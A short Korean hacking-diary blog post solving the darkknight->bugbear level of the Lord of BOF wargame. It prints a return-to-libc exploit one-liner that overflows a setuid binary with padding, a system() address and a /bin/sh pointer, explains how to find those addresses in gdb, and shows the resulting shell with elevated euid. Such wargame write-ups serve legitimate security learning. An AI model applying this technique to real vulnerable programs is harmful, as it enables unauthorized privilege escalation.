고졸백수해킹일기

darkknight->bugbear 본문

Wargame/lob

darkknight->bugbear

ExploitSori 2018. 2. 27. 15:24

../bugbear `python -c 'print "\x90"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\x1a\xfc\xff\xbf"+"/bin/sh"'`;

RTL을 이용하여 exploit해주면 된다.

system 주소는 main에 bp를 걸어주고 p system을 쳐주면 구할 수 있다.

/bin/sh의 주소는 esp+8에 넣어주면 된다. 


uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)

bash$ my-pass

euid = 513

new divide



'Wargame > lob' 카테고리의 다른 글

giant->assassin  (0) 2018.03.07
bugbear->giant  (0) 2018.03.07
golem->darkknight  (0) 2018.01.30
skeleton->golem  (0) 2018.01.30
vampire->skeleton  (0) 2018.01.28